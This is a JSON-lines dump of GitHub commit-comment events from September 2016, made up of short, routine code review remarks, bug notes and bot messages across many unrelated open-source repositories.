{"id":"4621538629","type":"CommitCommentEvent","actor":{"login":"tfairch2"},"repo":{"name":"tfairch2/Sleepy-Raindrops"},"payload":{"comment":{"id":19183697,"position":null,"line":null,"path":null,"commit_id":"90d45e151c046da0ee323d5080b87992e5395592","created_at":"2016-09-27T01:58:27Z","updated_at":"2016-09-27T01:58:27Z","body":"So far this section of the assignment will only display the players (0 thru 3).  I'm still working on getting the corresponding Hit Points to display as well.  Hopefully I will be able to set the starting values of HP then have the program subtract 5 points (and display the deduction) for each iteration of the FOR loop then progress through the other sections as I complete them."}},"created_at":"2016-09-27T01:58:27Z"}
{"id":"4621539984","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"etelem/relaxr-landing-page"},"payload":{"comment":{"id":19183700,"position":22,"line":22,"path":"index.html","commit_id":"fef652f76e52422b740b83a6520adc0cafc2fc81","created_at":"2016-09-27T01:58:57Z","updated_at":"2016-09-27T01:58:57Z","body":"No need for the span here."}},"created_at":"2016-09-27T01:58:57Z"}
{"id":"4621540203","type":"CommitCommentEvent","actor":{"login":"AnonXS"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19183701,"position":null,"line":null,"path":null,"commit_id":"f788841289313b688f6ec043d8d31aa493ec956e","created_at":"2016-09-27T01:59:02Z","updated_at":"2016-09-27T01:59:02Z","body":"I was wrong, .dist and actual pullrange do not match, maybe because morogrim hitbox+player hitbox. 35y seems fine."}},"created_at":"2016-09-27T01:59:02Z"}
{"id":"4621540857","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"etelem/relaxr-landing-page"},"payload":{"comment":{"id":19183706,"position":43,"line":43,"path":"index.html","commit_id":"fef652f76e52422b740b83a6520adc0cafc2fc81","created_at":"2016-09-27T01:59:16Z","updated_at":"2016-09-27T01:59:16Z","body":"No need for the span here."}},"created_at":"2016-09-27T01:59:16Z"}
{"id":"4623160156","type":"CommitCommentEvent","actor":{"login":"przeor"},"repo":{"name":"Ortee/Simple-React-DnD"},"payload":{"comment":{"id":19187837,"position":83,"line":83,"path":"src/routes/Home/components/EventsList.js","commit_id":"fc39481f98a350561ca17981a83c1a8a232fc515","created_at":"2016-09-27T10:00:21Z","updated_at":"2016-09-27T10:00:21Z","body":"Przy takim czymś używa się array.map, po co tyle tego tworzyć?"}},"created_at":"2016-09-27T10:00:21Z"}
{"id":"4623160256","type":"CommitCommentEvent","actor":{"login":"kamu60"},"repo":{"name":"simonpucher/AgenaTrader"},"payload":{"comment":{"id":19187838,"position":null,"line":null,"path":null,"commit_id":"78c75c98ab7559289c92b7c697f73a603d309ff2","created_at":"2016-09-27T10:00:22Z","updated_at":"2016-09-27T10:00:22Z","body":"Danke für den hilfreichen Code. Ich hätte jedoch ein paar Zusatzfragen.\r\n\r\nWie kann ich Parameter mit übergeben ? (z.B. Condition verwendet einen Indikator und ich möchte die Periode und den Timeframe übergeben, detto für Indikator verwendet Condition).\r\n\r\nWie funktioniert das Ganze in Kombination  mit MultiBars (TimeFrames) ?\r\nBsp. \r\nSMA(20)\r\nsteigt oder fällt\r\nauf 3 verschiedenen Timeframes (z.B. 60min, 5 min, 1min)\r\nAuswertung der Stati dieser 3 Timeframes und darauf reagieren\r\ndas ganze sollte betreffend der TimeFrames möglichst flexibel bleiben\r\nes sollten nicht Code-Varianten erzeugt werden, nur wegen dem TimeFrame.\r\naußerdem spielt die Performance eine Rolle.\r\n\r\nSo ein Bsp. wäre sehr hilfreich."}},"created_at":"2016-09-27T10:00:22Z"}
{"id":"4623161079","type":"CommitCommentEvent","actor":{"login":"jakechan2012"},"repo":{"name":"danielzzz/node-ping"},"payload":{"comment":{"id":19187840,"position":null,"line":null,"path":null,"commit_id":"1f2b784735bf9b635d4d4f7d146263a906c74c87","created_at":"2016-09-27T10:00:32Z","updated_at":"2016-09-27T10:00:32Z","body":"it works on windows, can you create tag and publish to npm ? @danielzzz , thx"}},"created_at":"2016-09-27T10:00:32Z"}
{"id":"4623161466","type":"CommitCommentEvent","actor":{"login":"boybook"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":19187842,"position":null,"line":null,"path":null,"commit_id":"38f0b7a300b905f790c6ef13ba9aff0438da68f4","created_at":"2016-09-27T10:00:37Z","updated_at":"2016-09-27T10:00:37Z","body":"Ok, I will add that later."}},"created_at":"2016-09-27T10:00:37Z"}
{"id":"4623162039","type":"CommitCommentEvent","actor":{"login":"GabrielTK"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19187846,"position":null,"line":null,"path":null,"commit_id":"3b65a69f74309069dc4f9e9af816ce58ca0d3652","created_at":"2016-09-27T10:00:43Z","updated_at":"2016-09-27T10:00:43Z","body":"Isn't the cfg.js missing???"}},"created_at":"2016-09-27T10:00:43Z"}
{"id":"4623162454","type":"CommitCommentEvent","actor":{"login":"simonwelsh"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19187849,"position":null,"line":null,"path":null,"commit_id":"18188097ed6c66ebb967d9f6706b32a652114f7e","created_at":"2016-09-27T10:00:47Z","updated_at":"2016-09-27T10:00:47Z","body":"Would be useful if this became part of the branching process, rather than waiting for the branch to be pushed."}},"created_at":"2016-09-27T10:00:47Z"}
{"id":"4623163770","type":"CommitCommentEvent","actor":{"login":"ianrrees"},"repo":{"name":"EvilMav/python-ivi"},"payload":{"comment":{"id":19187852,"position":null,"line":null,"path":null,"commit_id":"5c5bcd3cc889e975fcde7fc862d3d4a2c8f81c8d","created_at":"2016-09-27T10:01:03Z","updated_at":"2016-09-27T10:01:03Z","body":"Sorry I still haven't had a chance to hook up my signal generator and test this out.  Looks pretty good from a read through!  A couple style comments:\r\n\r\n  * Especially on github, but in general with Python too, it's nice to try and stick with the line length limits from PEP-8.  This ends up being especially helpful when using the docstrings in interactive terminals.\r\n  * I think for the unimplemented functions, it's better to either not have the function at all, or to replace the \"pass\" with a \"raise SomeException\".  Otherwise, people might have a hard time understanding why a particular feature is quietly not working.  I tend to abuse the builtin NotImplementedError for this purpose.\r\n\r\nThanks much, I'm looking forward to playing with this!"}},"created_at":"2016-09-27T10:01:03Z"}
{"id":"4623165734","type":"CommitCommentEvent","actor":{"login":"prigaux"},"repo":{"name":"UnivParis1/annuaire"},"payload":{"comment":{"id":19187857,"position":5,"line":28,"path":"app/resultSearch.html","commit_id":"ca2f55a843e63c8b8d89b96a41420593b280155e","created_at":"2016-09-27T10:01:27Z","updated_at":"2016-09-27T10:01:27Z","body":"Hélas ça ne marche pas, cette information est redondante avec le paramètre \"affiliation\".\r\nExemple : aller directement sur : https://annuaire-test.univ-paris1.fr/#/Recherche/pascal?affiliation=teacher\r\nc'est \"Tous\" qui est souligné"}},"created_at":"2016-09-27T10:01:27Z"}
{"id":"4623166393","type":"CommitCommentEvent","actor":{"login":"przeor"},"repo":{"name":"Ortee/Simple-React-DnD"},"payload":{"comment":{"id":19187859,"position":31,"line":26,"path":"src/routes/Home/components/HomeView.js","commit_id":"fc39481f98a350561ca17981a83c1a8a232fc515","created_at":"2016-09-27T10:01:33Z","updated_at":"2016-09-27T10:01:33Z","body":"To samo, to powinna być array.map"}},"created_at":"2016-09-27T10:01:33Z"}
{"id":"4623176483","type":"CommitCommentEvent","actor":{"login":"MarshallOfSound"},"repo":{"name":"MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-"},"payload":{"comment":{"id":19187872,"position":null,"line":null,"path":null,"commit_id":"944c3f89635f26ab4ef693fca32cdb1f1e2fd13f","created_at":"2016-09-27T10:03:21Z","updated_at":"2016-09-27T10:03:21Z","body":"@berryelectronics RIP\r\n\r\nAs @felixrieseberg once said:\r\n\r\n> Every single time we do something by hand, a pony dies"}},"created_at":"2016-09-27T10:03:21Z"}
{"id":"4623178402","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19187876,"position":429,"line":353,"path":"Sources/StringExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T10:03:43Z","updated_at":"2016-09-27T10:03:43Z","body":"https://github.com/goktugyil/EZSwiftExtensions/commit/03cc6c0611980ac31530fa402d2429ae15363815\r\n\r\nFeel free to add 1/0. Not sure about yes/no, because that is soo objective-c 😆 "}},"created_at":"2016-09-27T10:03:43Z"}
{"id":"4623179629","type":"CommitCommentEvent","actor":{"login":"shell2007"},"repo":{"name":"shell2007/miss"},"payload":{"comment":{"id":19187880,"position":null,"line":null,"path":null,"commit_id":"f6da28f68bcdd5e05b0ea0c4924836383cfe60b1","created_at":"2016-09-27T10:03:58Z","updated_at":"2016-09-27T10:03:58Z","body":"-hello\r\n-this is a java project"}},"created_at":"2016-09-27T10:03:58Z"}
{"id":"4623180558","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":19187881,"position":null,"line":null,"path":null,"commit_id":"064932e2e6557852d311f901e3c798cca8e34174","created_at":"2016-09-27T10:04:08Z","updated_at":"2016-09-27T10:04:08Z","body":"ok, that's fine! :)\r\n\r\nHowever:\r\n\r\n1) bdist creates a so-called \"dumb\" distribution package, which is now deprecated by the Python Packaging Authority. I can point you to relevant discussions on the distutils-sig mailing list. I suggest we replace `bdist` with `bdist_wheel`.\r\n\r\n1) the `install` target uses the old-fashioned `setup.py install`, which will use setuptools's easy_install and will create and install an *.egg package. The use of eggs and easy_install is being discouraged in favour of wheels and pip. So the recommended way to install from a source distribution would be `pip install .`, rather than `python setup.py install`."}},"created_at":"2016-09-27T10:04:08Z"}
{"id":"4623180701","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187882,"position":null,"line":null,"path":null,"commit_id":"8421b31f753ca8cd1a275654f07dcc982569af43","created_at":"2016-09-27T10:04:10Z","updated_at":"2016-09-27T10:04:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fAGsJXRZQNaxyjbOiDE-1Q"}},"created_at":"2016-09-27T10:04:10Z"}
{"id":"4623184571","type":"CommitCommentEvent","actor":{"login":"cardosogabriel"},"repo":{"name":"cardosogabriel/bm-fundraising"},"payload":{"comment":{"id":19187891,"position":26,"line":186,"path":"index.html","commit_id":"04f5522c6df802406cd2d9156f2762bea12c876a","created_at":"2016-09-27T10:04:56Z","updated_at":"2016-09-27T10:04:56Z","body":"This div was unnecessary since it is empty. \r\nU see that by removing it the layout doesn't break."}},"created_at":"2016-09-27T10:04:56Z"}
{"id":"4623186032","type":"CommitCommentEvent","actor":{"login":"azabluda"},"repo":{"name":"6bee/aqua-core"},"payload":{"comment":{"id":19187897,"position":16,"line":35,"path":"src/Aqua/Aqua/TypeExtensions.cs","commit_id":"9dcc464c9f3945fb39ff7ae4b5563fa6cb99fb82","created_at":"2016-09-27T10:05:15Z","updated_at":"2016-09-27T10:05:15Z","body":"These two functions are called thousands of times. `GetCustomAttributes().Any()` is suboptimal, please consider using `Attribute.IsDefined()` instead."}},"created_at":"2016-09-27T10:05:15Z"}
{"id":"4623189755","type":"CommitCommentEvent","actor":{"login":"kasbah"},"repo":{"name":"Bristol-Braille/canute-ui"},"payload":{"comment":{"id":19187904,"position":null,"line":null,"path":null,"commit_id":"ec1adab6755eb220a90c09c5195f109632f3df2c","created_at":"2016-09-27T10:05:58Z","updated_at":"2016-09-27T10:05:58Z","body":"Why did you add this? Did you check my changes to INSTALL.md? "}},"created_at":"2016-09-27T10:05:58Z"}
{"id":"4623190503","type":"CommitCommentEvent","actor":{"login":"hzsweers"},"repo":{"name":"nickbutcher/plaid"},"payload":{"comment":{"id":19187906,"position":118,"line":283,"path":"app/src/main/java/io/plaidapp/ui/widget/BottomSheet.java","commit_id":"69fefeb683d0bc08aba45d7edea71c8927fb476c","created_at":"2016-09-27T10:06:07Z","updated_at":"2016-09-27T10:06:07Z","body":"`dismissing` is always false here after the first block"}},"created_at":"2016-09-27T10:06:07Z"}
{"id":"4623194068","type":"CommitCommentEvent","actor":{"login":"chegelchen"},"repo":{"name":"chegelchen/test"},"payload":{"comment":{"id":19187911,"position":null,"line":null,"path":null,"commit_id":"21b407cf9146f6e86d47af6598400da5aae41692","created_at":"2016-09-27T10:06:49Z","updated_at":"2016-09-27T10:06:49Z","body":"test 1\r\n#test 2#\r\n## test 3##"}},"created_at":"2016-09-27T10:06:49Z"}
{"id":"4623197171","type":"CommitCommentEvent","actor":{"login":"kYroL01"},"repo":{"name":"ntop/nDPI"},"payload":{"comment":{"id":19187915,"position":null,"line":null,"path":null,"commit_id":"67ac0b431c3bb812829db4a927a309a089bca13e","created_at":"2016-09-27T10:07:27Z","updated_at":"2016-09-27T10:07:27Z","body":"@lucaderi I see that this cause a sigfault for other pcaps (i.e. starcraft).\r\nAre u sure is necessary ? Because I see that the initialization of **end** is _u_int16_t end = packet->payload_packet_len - 1;_"}},"created_at":"2016-09-27T10:07:27Z"}
{"id":"4623201144","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19187922,"position":30,"line":30,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-27T10:08:13Z","updated_at":"2016-09-27T10:08:13Z","body":"Agreed, but then this period is a problem that maybe needs highlighted more. There needs to be a way the whole network recalculated at once or the tree can continually morph or perhaps even having locked data chains and checkpoints or some other method? "}},"created_at":"2016-09-27T10:08:13Z"}
{"id":"4623201370","type":"CommitCommentEvent","actor":{"login":"superbobry"},"repo":{"name":"pacahon/datrie"},"payload":{"comment":{"id":19187923,"position":16,"line":913,"path":"src/datrie.pyx","commit_id":"9b4daa9e8a3a84e6e14211536e315817cd971aa5","created_at":"2016-09-27T10:08:15Z","updated_at":"2016-09-27T10:08:15Z","body":"I think you should proxy it from `BaseState` if you want to use it, but I'm not completely sure."}},"created_at":"2016-09-27T10:08:15Z"}
{"id":"4623201882","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187924,"position":null,"line":null,"path":null,"commit_id":"7de488dbd64b496f1216441d9dd0a44ec4484402","created_at":"2016-09-27T10:08:21Z","updated_at":"2016-09-27T10:08:21Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GvSG6DllTyGb7fyLcj5bew"}},"created_at":"2016-09-27T10:08:21Z"}
{"id":"4623204163","type":"CommitCommentEvent","actor":{"login":"kasbah"},"repo":{"name":"Bristol-Braille/canute-ui"},"payload":{"comment":{"id":19187929,"position":null,"line":null,"path":null,"commit_id":"b81dc4081746b203d7ba942d18cc36df7a31a1df","created_at":"2016-09-27T10:08:48Z","updated_at":"2016-09-27T10:08:48Z","body":"Can we make it policy to `git pull --rebase` so we don't litter the history with merge commits?"}},"created_at":"2016-09-27T10:08:48Z"}
{"id":"4623205850","type":"CommitCommentEvent","actor":{"login":"simonwelsh"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19187933,"position":null,"line":null,"path":null,"commit_id":"db68be89032ed8e16498f9e2dd4e32bde334a792","created_at":"2016-09-27T10:09:08Z","updated_at":"2016-09-27T10:09:08Z","body":"fbshipit needs to ship the Phabricator macro images out too :p"}},"created_at":"2016-09-27T10:09:08Z"}
{"id":"4623206597","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19187936,"position":18,"line":18,"path":"db/src/main/java/org/task/schedulers/ScheduledBalanceStatistic.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-27T10:09:18Z","updated_at":"2016-09-27T10:09:18Z","body":"The whole balance calculation (find + save) could have been done in one SQL / one repository method. There is no need to split the operations into two repository actions as they make sense only when run together (there is no need to change anything at this point)."}},"created_at":"2016-09-27T10:09:18Z"}
{"id":"4623211300","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19187945,"position":40,"line":40,"path":"db/src/test/java/org/task/repositories/BalanceRepositoryTest.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-27T10:10:13Z","updated_at":"2016-09-27T10:10:13Z","body":"Kudos for the test, it is good that we have it here."}},"created_at":"2016-09-27T10:10:13Z"}
{"id":"4623212712","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187949,"position":null,"line":null,"path":null,"commit_id":"f208349b3149e2f93e4fbd57a231bcc0b8210ac8","created_at":"2016-09-27T10:10:30Z","updated_at":"2016-09-27T10:10:30Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#LzGLKa_fRkWH9KK9B7IPLQ"}},"created_at":"2016-09-27T10:10:30Z"}
{"id":"4623219903","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19187971,"position":72,"line":72,"path":"executors/src/main/java/org/test/TaskExecutorImpl.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-27T10:12:00Z","updated_at":"2016-09-27T10:12:00Z","body":"Timeout and tasks are removed from the map only when cancel is called. It may happen that cancel is never called, then the service will accumulate garbage leading to a memory leak."}},"created_at":"2016-09-27T10:12:00Z"}
{"id":"4623221077","type":"CommitCommentEvent","actor":{"login":"ahilles107"},"repo":{"name":"superdesk/web-publisher"},"payload":{"comment":{"id":19187973,"position":6,"line":15,"path":"src/SWP/Component/Storage/composer.json","commit_id":"82ab1d4e2437b12b4c2e1de19686d1029bd23baf","created_at":"2016-09-27T10:12:14Z","updated_at":"2016-09-27T10:12:14Z","body":"You need doctrine common or just `doctrine/collections` will be enough? "}},"created_at":"2016-09-27T10:12:14Z"}
{"id":"4623223161","type":"CommitCommentEvent","actor":{"login":"lu40"},"repo":{"name":"Openki/Openki"},"payload":{"comment":{"id":19187981,"position":9,"line":9,"path":"client/lib/mediaQueryBreakpoints.js","commit_id":"6fb5130824520796923fa0814c2cf39bd6ddaf4b","created_at":"2016-09-27T10:12:40Z","updated_at":"2016-09-27T10:12:40Z","body":"@sbalmer not sure if client/lib/ is the right place to put this?"}},"created_at":"2016-09-27T10:12:40Z"}
{"id":"4623223273","type":"CommitCommentEvent","actor":{"login":"vtsukur"},"repo":{"name":"kallura/balance-calculation"},"payload":{"comment":{"id":19187982,"position":57,"line":57,"path":"executors/src/main/java/org/test/TaskExecutorImpl.java","commit_id":"94a10024c6e1a1d3d3d4872d8b5274838ebe5378","created_at":"2016-09-27T10:12:42Z","updated_at":"2016-09-27T10:12:42Z","body":"We should have pass along original cause here and in the `catch` clause below."}},"created_at":"2016-09-27T10:12:42Z"}
{"id":"4623230440","type":"CommitCommentEvent","actor":{"login":"hakimihamdan88"},"repo":{"name":"Mochaka/laravel-shopify"},"payload":{"comment":{"id":19187994,"position":null,"line":null,"path":null,"commit_id":"c1cf853c38b38681e8b1754031738ea1e1a5aee2","created_at":"2016-09-27T10:14:11Z","updated_at":"2016-09-27T10:14:11Z","body":"+1"}},"created_at":"2016-09-27T10:14:11Z"}
{"id":"4623230538","type":"CommitCommentEvent","actor":{"login":"deepaksabharwal2211"},"repo":{"name":"deepaksabharwal2211/allscripts"},"payload":{"comment":{"id":19187995,"position":18,"line":100,"path":"README.md","commit_id":"4d93700d2bfdd8fa6263aa75660c02946b82634a","created_at":"2016-09-27T10:14:12Z","updated_at":"2016-09-27T10:14:12Z","body":"added"}},"created_at":"2016-09-27T10:14:12Z"}
{"id":"4623231075","type":"CommitCommentEvent","actor":{"login":"ianrrees"},"repo":{"name":"EvilMav/python-ivi"},"payload":{"comment":{"id":19187998,"position":185,"line":185,"path":"ivi/siglent/siglentSDG2000X.py","commit_id":"5c5bcd3cc889e975fcde7fc862d3d4a2c8f81c8d","created_at":"2016-09-27T10:14:19Z","updated_at":"2016-09-27T10:14:19Z","body":"This construct masks any AttributeErrors that might get raised in the parent's _init_outputs().  If the goal is to check whether the super has a method _init_outputs(), then perhaps something like this could work:\r\n\r\n# Call parent's _init_outputs(), if it exists\r\ninitParent = lambda: None\r\ntry:\r\n    # Note that we don't actually call the method here\r\n    initParent = super(siglentSDG2000X, self)._init_outputs\r\nexcept AttributeError:\r\n    # This only happens if there's no _init_outputs in the super class\r\n    pass\r\n# This either executes the parent's _init_outputs(), or the \"empty\" lambda function\r\ninitParent()\r\n\r\n"}},"created_at":"2016-09-27T10:14:19Z"}
{"id":"4623235557","type":"CommitCommentEvent","actor":{"login":"thinkyhead"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19188013,"position":null,"line":null,"path":null,"commit_id":"ea0dbee3c93fa221b8c7d3b6c566d635eae2afd2","created_at":"2016-09-27T10:15:08Z","updated_at":"2016-09-27T10:15:08Z","body":"Concise, but not clear.\r\n- What kind of setup?\r\n- What style of bed leveling?\r\n- Expected vs. actual behavior?\r\n- Steps to reproduce?\r\n- Post a log?\r\n- Theory as to root cause?\r\n- Configuration files?\r\n It might be fixed already. Try `RCBugFix` as of today. Or, it may just be a simple typo. At the moment I lack a cartesian or Delta printer to test with. However, I tested the code on a SCARA today and it seemed to work."}},"created_at":"2016-09-27T10:15:08Z"}
{"id":"4623239145","type":"CommitCommentEvent","actor":{"login":"pixeltrix"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19188020,"position":null,"line":null,"path":null,"commit_id":"fb42c492a7eff58f45867ea50440d938648cdb48","created_at":"2016-09-27T10:15:50Z","updated_at":"2016-09-27T10:15:50Z","body":"@helperhaps you'd be better off opening a ticket than commenting on an 12 month old commit. We should probably handle that in the PostgreSQL adapter rather than adding another config."}},"created_at":"2016-09-27T10:15:50Z"}
{"id":"4623239957","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"phplang/phack"},"payload":{"comment":{"id":19188024,"position":48,"line":233,"path":"lib/PhpParser/Lexer/HackLang.php","commit_id":"1cb603d88be465dcb7ce6d1856c8defb46766c34","created_at":"2016-09-27T10:16:03Z","updated_at":"2016-09-27T10:16:03Z","body":"Won't this cause problems with varvars?"}},"created_at":"2016-09-27T10:16:03Z"}
{"id":"4623240639","type":"CommitCommentEvent","actor":{"login":"kovetskiy"},"repo":{"name":"brnv/dotfiles"},"payload":{"comment":{"id":19188027,"position":11,"line":11,"path":"bin/m4a-to-mp3","commit_id":"02e72f1fb2cf28df3b635b712fedf97ed95d04ac","created_at":"2016-09-27T10:16:12Z","updated_at":"2016-09-27T10:16:12Z","body":"&>/dev/null"}},"created_at":"2016-09-27T10:16:12Z"}
{"id":"4623241517","type":"CommitCommentEvent","actor":{"login":"emaish"},"repo":{"name":"emaish/aspnetboilerplate"},"payload":{"comment":{"id":19188028,"position":null,"line":null,"path":null,"commit_id":"145ef1a539dfc5497c961a49c923cfc1b40b5966","created_at":"2016-09-27T10:16:23Z","updated_at":"2016-09-27T10:16:23Z","body":"Calling Repository.GetAsync will throw exception if id doesn't exist, we should use FirstOrDefaultAsync for more flexibility"}},"created_at":"2016-09-27T10:16:23Z"}
{"id":"4623246705","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"jamesbascle/OneOf"},"payload":{"comment":{"id":19188043,"position":null,"line":null,"path":null,"commit_id":"ddfaba62ca2210c47bee4411b354ccc52d015156","created_at":"2016-09-27T10:17:28Z","updated_at":"2016-09-27T10:17:28Z","body":"@Jagged Give this a look.  I maintained your API on the match, but constrained the options on the fluent interface by removing T{n}s from the available lamdas as they were used."}},"created_at":"2016-09-27T10:17:28Z"}
{"id":"4623246997","type":"CommitCommentEvent","actor":{"login":"takeit"},"repo":{"name":"superdesk/web-publisher"},"payload":{"comment":{"id":19188044,"position":6,"line":15,"path":"src/SWP/Component/Storage/composer.json","commit_id":"82ab1d4e2437b12b4c2e1de19686d1029bd23baf","created_at":"2016-09-27T10:17:32Z","updated_at":"2016-09-27T10:17:32Z","body":"doctrine/common as I need `Doctrine\\Common\\Persistence\\ObjectRepository` which is used in `SWP\\Component\\Storage\\Repository\\RepositoryInterface`"}},"created_at":"2016-09-27T10:17:32Z"}
{"id":"4623248603","type":"CommitCommentEvent","actor":{"login":"mikerhyner"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19188045,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T10:17:51Z","updated_at":"2016-09-27T10:17:51Z","body":"Unfortunately, the fix introduced within Version 1.2.10, has gone lost somehow with newest version (i-MSCP 1.3.3, Build: 20160924, Codename: Horner). Within tar.gz file (imscp-1.3.3.tar.gz), configs/debian/apache/ 00_nameserver.conf, is missing the \"ProxyErrorOverride\" Directive again.\r\n"}},"created_at":"2016-09-27T10:17:51Z"}
{"id":"4623250312","type":"CommitCommentEvent","actor":{"login":"Bjay21"},"repo":{"name":"gpdls94/android_cchat"},"payload":{"comment":{"id":19188047,"position":null,"line":null,"path":null,"commit_id":"9013c2754b2d17322028ebb63c3d3bba8ba82187","created_at":"2016-09-27T10:18:14Z","updated_at":"2016-09-27T10:18:14Z","body":"혜이니 짱!"}},"created_at":"2016-09-27T10:18:14Z"}
{"id":"4623250935","type":"CommitCommentEvent","actor":{"login":"SoftCreatR"},"repo":{"name":"johndyer/mediaelement"},"payload":{"comment":{"id":19188049,"position":null,"line":null,"path":null,"commit_id":"d55d7b908c01b191527b5e987c6ff581aee4bb2b","created_at":"2016-09-27T10:18:21Z","updated_at":"2016-09-27T10:18:21Z","body":"Hi,\r\n\r\nit wasn't completely off, but imperfect ;)\r\n\r\n- `Fullscreen` isn't a german word (it's `Vollbild`), for example\r\n- `trechts` is a typo (it's `rechts`)\r\n- `Entfällt` is a wrong translation for `none`\r\n\r\nand so on. I'm a native speaker, so i thought, it might be a good idea to perform the translation by myself :P\r\n\r\nBut don't worry. Even the translation that is used in Wordpress (they're using their own) is not the best one :)"}},"created_at":"2016-09-27T10:18:21Z"}
{"id":"4623251028","type":"CommitCommentEvent","actor":{"login":"simonpoole"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19188051,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T10:18:22Z","updated_at":"2016-09-27T10:18:22Z","body":"If somebody who was at that time on the board actually created the \"OpenStreetMap\" organisation, or if you could at least make clear that this was work done \"for hire\" clearly you can set the policies for inclusion of projects under the umbrella (outside of that it is simply somebody misusing the trademark). \r\n\r\nYou would however need to find an arrangement with projects that were included before such policies were made, and you couldn't actually stop projects from leaving.\r\n\r\nThe downside is naturally that somebody might infer liability of the OSMF if something goes wrong in a wide sense of the word with a project included in the org. "}},"created_at":"2016-09-27T10:18:22Z"}
{"id":"4623252273","type":"CommitCommentEvent","actor":{"login":"ianrrees"},"repo":{"name":"EvilMav/python-ivi"},"payload":{"comment":{"id":19188056,"position":242,"line":242,"path":"ivi/siglent/siglentSDG2000X.py","commit_id":"5c5bcd3cc889e975fcde7fc862d3d4a2c8f81c8d","created_at":"2016-09-27T10:18:40Z","updated_at":"2016-09-27T10:18:40Z","body":"Is this hard-coded value intentional?"}},"created_at":"2016-09-27T10:18:40Z"}
{"id":"4623252705","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19188058,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T10:18:46Z","updated_at":"2016-09-27T10:18:46Z","body":"We removed it because that directive caused many problems."}},"created_at":"2016-09-27T10:18:46Z"}
{"id":"4623256586","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"sadovnik/converter"},"payload":{"comment":{"id":19188064,"position":11,"line":14,"path":"src/Converter.php","commit_id":"665e3b7744b859b6578863ce064b6c955e48882a","created_at":"2016-09-27T10:19:34Z","updated_at":"2016-09-27T10:19:34Z","body":"Да, `throw` обычно применяют к исключениям. Что лучше: `getUnknownExtentionError` или `triggerUnknownExtentionError`?\r\n\r\nКстати, заметил что наружу зачем-то выдаю `Result`, а надо делать `getOrThrow`."}},"created_at":"2016-09-27T10:19:34Z"}
{"id":"4623257526","type":"CommitCommentEvent","actor":{"login":"MinsuKimhero"},"repo":{"name":"MinsuKimhero/musicschool63"},"payload":{"comment":{"id":19188067,"position":null,"line":null,"path":null,"commit_id":"3d6d76addfff33d048f27ca773d94402ca6d8e6c","created_at":"2016-09-27T10:19:46Z","updated_at":"2016-09-27T10:19:46Z","body":"dd"}},"created_at":"2016-09-27T10:19:46Z"}
{"id":"4623260316","type":"CommitCommentEvent","actor":{"login":"Nanomani"},"repo":{"name":"pydio/pydio-core"},"payload":{"comment":{"id":19188076,"position":null,"line":null,"path":null,"commit_id":"6066668c2de7b61fa825dd03ae12bad7af570546","created_at":"2016-09-27T10:20:20Z","updated_at":"2016-09-27T10:20:20Z","body":"this works well if I had in your code\r\nafter line 71 `$dir = InputFilter::decodeSecureMagic($dir);`\r\nadd this `$dir = TextEncoder::toStorageEncoding($dir);`\r\n\r\nand\r\n\r\nafter line 147 `$archiveName = ApplicationState::getAjxpTmpDir() . DIRECTORY_SEPARATOR . $opeId . \"_\" . $archiveName;`\r\nadd this `$archiveName = TextEncoder::toStorageEncoding($archiveName);`\r\n\r\n\r\n"}},"created_at":"2016-09-27T10:20:20Z"}
